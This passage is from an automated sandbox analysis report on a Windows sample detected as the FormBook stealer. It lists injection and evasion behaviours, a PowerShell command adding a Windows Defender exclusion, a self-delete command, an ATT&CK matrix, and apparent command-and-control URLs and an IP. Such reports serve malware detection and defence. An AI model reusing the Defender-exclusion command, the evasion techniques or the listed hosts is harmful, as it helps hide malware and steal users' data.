          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B68DBF mov eax, dword ptr fs:[00000030h]4_2_01B68DBF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B68DBF mov eax, dword ptr fs:[00000030h]4_2_01B68DBF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B76DA0 mov eax, dword ptr fs:[00000030h]4_2_01B76DA0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B36DF6 mov eax, dword ptr fs:[00000030h]4_2_01B36DF6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00800B1F GetLastError,SetLastError,GetProcessHeap,HeapFree,8_2_00800B1F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00888847 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00888847
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.26.122.70 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeNtQueueApcThread: Indirect: 0x16AA4F2Jump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeNtClose: Indirect: 0x16AA56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeMemory written: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeThread register set: target process: 4084Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 4084Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 770000Jump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000002.2809525742.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2806086310.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2806908050.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2806908050.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.1569063480.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285702031.0000000009378000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: GetLocaleInfoW,wcsncmp,8_2_008865E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00887751 GetSystemTime,SystemTimeToFileTime,GetLastError,8_2_00887751
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00812831 GetUserNameExW,GetLastError,GetLastError,GetUserNameExW,GetLastError,SetLastError,LoadLibraryExW,GetLastError,GetProcAddress,GetLastError,NetApiBufferFree,FreeLibrary,8_2_00812831
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008092B6 memset,GetVersionExW,GetLastError,GetLastError,8_2_008092B6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008144EC LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,8_2_008144EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008185B1 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,8_2_008185B1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0081873B RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,8_2_0081873B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007E8C82 socket,setsockopt,bind,setsockopt,setsockopt,setsockopt,listen,WSAEventSelect,WSAEventSelect,8_2_007E8C82
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00813E64 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,8_2_00813E64

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		11
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol1
          Screen Capture          		2
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)612
          Process Injection          		1
          Abuse Elevation Control Mechanism          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Credential API Hooking          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
          Obfuscated Files or Information          		NTDS225
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Software Packing          		LSA Secrets241
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Rootkit          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
          Process Injection          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549204 Sample: TEKL#U0130F #U0130ST.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 37 www.refabricated-homes-74404.bond 2->37 39 www.oko.events 2->39 41 4 other IPs or domains 2->41 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 12 other signatures 2->51 11 TEKL#U0130F #U0130ST.exe 4 2->11         started        signatures3 process4 file5 35 C:\Users\...\TEKL#U0130F #U0130ST.exe.log, ASCII 11->35 dropped 55 Adds a directory exclusion to Windows Defender 11->55 57 Injects a PE file into a foreign processes 11->57 15 TEKL#U0130F #U0130ST.exe 11->15         started        18 powershell.exe 23 11->18         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 75 2 other signatures 15->75 20 explorer.exe 40 1 15->20 injected 73 Loading BitLocker PowerShell Module 18->73 24 WmiPrvSE.exe 18->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 43 www.oko.events 185.26.122.70, 49784, 80 HOSTLANDRU Russian Federation 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 28 mstsc.exe 20->28         started        signatures11 process12 signatures13 59 Modifies the context of a thread in another process (thread injection) 28->59 61 Maps a DLL or memory area into another process 28->61 63 Tries to detect virtualization through RDTSC time measurements 28->63 65 Switches to a custom stack to bypass stack traces 28->65 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TEKL#U0130F #U0130ST.exe34%ReversingLabsByteCode-MSIL.Backdoor.FormBook
          TEKL#U0130F #U0130ST.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.eals.latReferer:0%Avira URL Cloudsafe
          http://www.52cy67sk.bondReferer:0%Avira URL Cloudsafe
          http://www.obs-for-seniors-39582.bond/bc01/www.oko.events0%Avira URL Cloudsafe
          http://www.oko.events/bc01/0%Avira URL Cloudsafe
          http://www.aming-chair-83359.bond/bc01/www.refabricated-homes-74404.bond0%Avira URL Cloudsafe
          http://www.52cy67sk.bond0%Avira URL Cloudsafe
          http://www.ajabandot.website0%Avira URL Cloudsafe
          http://www.ewferg.top/bc01/100%Avira URL Cloudmalware
          http://www.irmag.online0%Avira URL Cloudsafe
          http://www.obs-for-seniors-39582.bond0%Avira URL Cloudsafe
          http://www.oko.events/bc01/www.aming-chair-83359.bond0%Avira URL Cloudsafe
          http://www.eals.lat/bc01/www.ajabandot.website0%Avira URL Cloudsafe
          http://www.2ar1.shop0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.netReferer:0%Avira URL Cloudsafe
          http://www.y-language-menu.netReferer:0%Avira URL Cloudsafe
          http://www.lkjuy.xyzReferer:0%Avira URL Cloudsafe
          http://www.ewferg.top/bc01/www.52cy67sk.bond100%Avira URL Cloudmalware
          http://www.lkjuy.xyz0%Avira URL Cloudsafe
          http://www.y-language-menu.net/bc01/www.avada-casino-tlj.buzz0%Avira URL Cloudsafe
          http://www.ewferg.topReferer:0%Avira URL Cloudsafe
          http://www.irmag.onlineReferer:0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.net0%Avira URL Cloudsafe
          http://www.2ar1.shop/bc01/www.obs-for-seniors-39582.bond0%Avira URL Cloudsafe
          http://www.nline-degree-6987776.world/bc01/www.ntercash24-cad.homes0%Avira URL Cloudsafe
          http://www.refabricated-homes-74404.bond0%Avira URL Cloudsafe
          http://www.ntercash24-cad.homes/bc01/0%Avira URL Cloudsafe
          http://www.eals.lat0%Avira URL Cloudsafe
          http://www.nline-degree-6987776.world0%Avira URL Cloudsafe
          http://www.irmag.online/bc01/0%Avira URL Cloudsafe
          http://www.refabricated-homes-74404.bondReferer:0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzz/bc01/www.olocaustaffirmer.net0%Avira URL Cloudsafe
          http://www.ajabandot.websiteReferer:0%Avira URL Cloudsafe
          http://www.lkjuy.xyz/bc01/www.ewferg.top0%Avira URL Cloudsafe
          http://www.aming-chair-83359.bond0%Avira URL Cloudsafe
          http://www.lkjuy.xyz/bc01/0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzz/bc01/0%Avira URL Cloudsafe
          http://www.refabricated-homes-74404.bond/bc01/0%Avira URL Cloudsafe
          https://java.B0%Avira URL Cloudsafe
          www.avada-casino-tlj.buzz/bc01/0%Avira URL Cloudsafe
          http://www.irmag.online/bc01/www.eals.lat0%Avira URL Cloudsafe
          http://www.ntercash24-cad.homes/bc01/www.irmag.online0%Avira URL Cloudsafe
          http://www.obs-for-seniors-39582.bond/bc01/0%Avira URL Cloudsafe
          http://www.aming-chair-83359.bond/bc01/0%Avira URL Cloudsafe
          http://www.ntercash24-cad.homes0%Avira URL Cloudsafe
          http://www.2ar1.shop/bc01/0%Avira URL Cloudsafe
          http://www.y-language-menu.net/bc01/0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.net/bc01/0%Avira URL Cloudsafe
          http://www.nline-degree-6987776.world/bc01/0%Avira URL Cloudsafe
          http://www.nline-degree-6987776.worldReferer:0%Avira URL Cloudsafe
          http://www.ntercash24-cad.homesReferer:0%Avira URL Cloudsafe
          http://www.refabricated-homes-74404.bond/bc01/www.nline-degree-6987776.world0%Avira URL Cloudsafe
          http://www.52cy67sk.bond/bc01/MMfl0%Avira URL Cloudsafe
          http://www.ewferg.top100%Avira URL Cloudmalware
          http://www.olocaustaffirmer.net/bc01/www.lkjuy.xyz0%Avira URL Cloudsafe
          http://www.ajabandot.website/bc01/www.y-language-menu.net0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzzReferer:0%Avira URL Cloudsafe
          http://www.52cy67sk.bond/bc01/0%Avira URL Cloudsafe

